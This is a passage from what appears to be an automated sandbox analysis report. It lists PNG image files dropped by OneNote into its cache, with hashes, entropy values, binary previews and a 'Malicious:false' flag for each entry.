                                                                                                                                                    Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000015.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4181
                                                                                                                                                    Entropy (8bit):7.943341403425058
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                                    MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                                    SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                                    SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                                    SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000016.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2599
                                                                                                                                                    Entropy (8bit):7.903700862190034
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                                    MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                                    SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                                    SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                                    SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000017.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1570
                                                                                                                                                    Entropy (8bit):7.780157858994452
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                                    MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                                    SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                                    SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                                    SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000018.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4490
                                                                                                                                                    Entropy (8bit):7.928016176674318
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                                    MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                                    SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                                    SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                                    SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000019.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):11449
                                                                                                                                                    Entropy (8bit):7.91552812501629
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                                    MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                                    SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                                    SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                                    SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001C.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):3679
                                                                                                                                                    Entropy (8bit):7.931319059366604
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                                    MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                                    SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                                    SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                                    SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001D.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2232
                                                                                                                                                    Entropy (8bit):7.837610270261933
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                                    MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                                    SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                                    SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                                    SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001E.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1604
                                                                                                                                                    Entropy (8bit):7.814570704154439
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                    MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                    SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                    SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                    SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001F.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):13084
                                                                                                                                                    Entropy (8bit):7.940058639272698
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                                    MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                                    SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                                    SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                                    SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001G.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1604
                                                                                                                                                    Entropy (8bit):7.814570704154439
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                    MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                    SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                    SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                    SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001H.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4847
                                                                                                                                                    Entropy (8bit):7.950192613458318
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                                    MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                                    SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                                    SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                                    SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001I.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1604
                                                                                                                                                    Entropy (8bit):7.814570704154439
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                    MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                    SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                    SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                    SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                    Malicious:false
